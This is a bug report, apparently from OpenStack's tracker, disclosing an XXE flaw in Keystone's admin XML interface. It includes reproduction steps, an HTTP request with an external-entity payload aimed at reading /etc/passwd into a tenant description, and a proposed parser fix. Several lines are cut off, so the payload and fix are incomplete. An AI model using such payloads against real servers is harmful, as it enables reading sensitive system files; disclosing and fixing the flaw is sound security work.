XXE vulnerability in keystone
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Identity (keystone) |
New
|
Undecided
|
Unassigned |
Bug Description
It's possible to gain access to arbitrary files on a keystone server by injecting XXE to the admin interface of a keystone server.
You need a valid admin token achieve this.
1. Authenticate to the Keystone service to gain a valid administrative token.
2. Submit the request below to the admin keystone endpoint.
3. Verify a tenant is created and the "description" field contains the contents of the /etc/passwd file on the keystone server.
POST
https:/
HTTP/1.1
Host: admin-auth-
Content-length: 253
Proxy-Connection: Keep-Alive
Accept: */*
X-Auth-Token: <VALID AUTH TOKEN>
User-Agent: python-
Content-Type: application/xml
Accept: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY foo SYSTEM "file:/
<tenant xmlns="http://
enabled="true" id="XxeTest2" name="Xxe Tenant 2">
<description>
</tenant>
Possible solution:
keystone/
class XmlDeserializer
def __call__(self, xml_str):
"""Returns a dictionary populated by decoding the given xml string."""
dom = etree.fromstrin
return self.walk_
Replace:
dom = etree.fromstrin
With:
dom = etree.fromstrin
parser=
Duplicate bug that is marked fixed released, making un-private.